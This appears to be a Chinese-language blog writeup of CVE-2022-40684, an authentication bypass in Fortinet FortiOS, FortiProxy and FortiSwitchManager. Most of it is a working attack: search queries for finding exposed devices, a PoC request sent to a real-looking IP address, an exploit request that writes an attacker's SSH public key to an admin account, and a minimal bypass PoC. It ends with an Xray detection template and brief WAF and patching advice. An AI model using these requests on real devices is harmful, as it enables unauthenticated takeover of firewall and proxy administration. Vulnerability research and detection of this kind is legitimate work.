GitHub地址：https://github.com/hughink/CVE-2022-40684

漏洞简介

Fortinet（飞塔）是一家全球知名的网络安全产品和安全解决方案提供商，其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中，可以通过使用备用路径或通道绕过身份验证，并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

影响版本

• FortiOS 版本 7.2.0 - 7.2.1
• FortiOS 版本 7.0.0 - 7.0.6
• FortiProxy 版本 7.2.0
• FortiProxy 版本 7.0.0 - 7.0.6
• FortiSwitchManager 版本 7.2.0
• FortiSwitchManager 版本 7.0.0

搜索语法

title="FortiProxy"
title="FortiGate"

Poc数据包

GET /api/v2/cmdb/system/admin HTTP/2
Host: 35.192.137.121
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

Exp数据包

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

漏洞复现

经过实验发现User-Agent只能为Node.js，Hosts可以删除，Forwarded中by和for的值可以为空，X-Forwarded-Vdom可以是任意值，最精简Poc：

GET /api/v2/cmdb/system/admin HTTP/2
Host: 35.192.137.121
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Forwarded: by=""for=""
X-Forwarded-Vdom: abcd

测试结果如图，想了想美国IP就算打码了：

漏洞利用部分就查看hughink的GitHub吧，写的挺详细的。

Xray Poc

{cat_hide}

name: poc-yaml-Fortinet-CVE-2022-40684
manual: true
transport: http
rules:
    r1:
        request:
            method: GET
            path: /api/v2/cmdb/system/admin
            headers:
                User-Agent: Node.js
                Forwarded: by=""for=""
                X-Forwarded-Vdom: root
            follow_redirects: false
        expression:
            response.status==200 && response.body.bcontains(b"revision") && response.body.bcontains(b"q_origin_key")
expression:
    r1()

detail:
    author: Infiltrator
    links:
        - https://github.com/NHPT

{/cat_hide}

漏洞检测结果：

防护建议

除了升级版本安装补丁外，由于User-Agent的值固定，Forwarded和X-Forwarded-Vdom存在，所以特征还是很明显的，设置WAF策略应该也是不容易绕过的。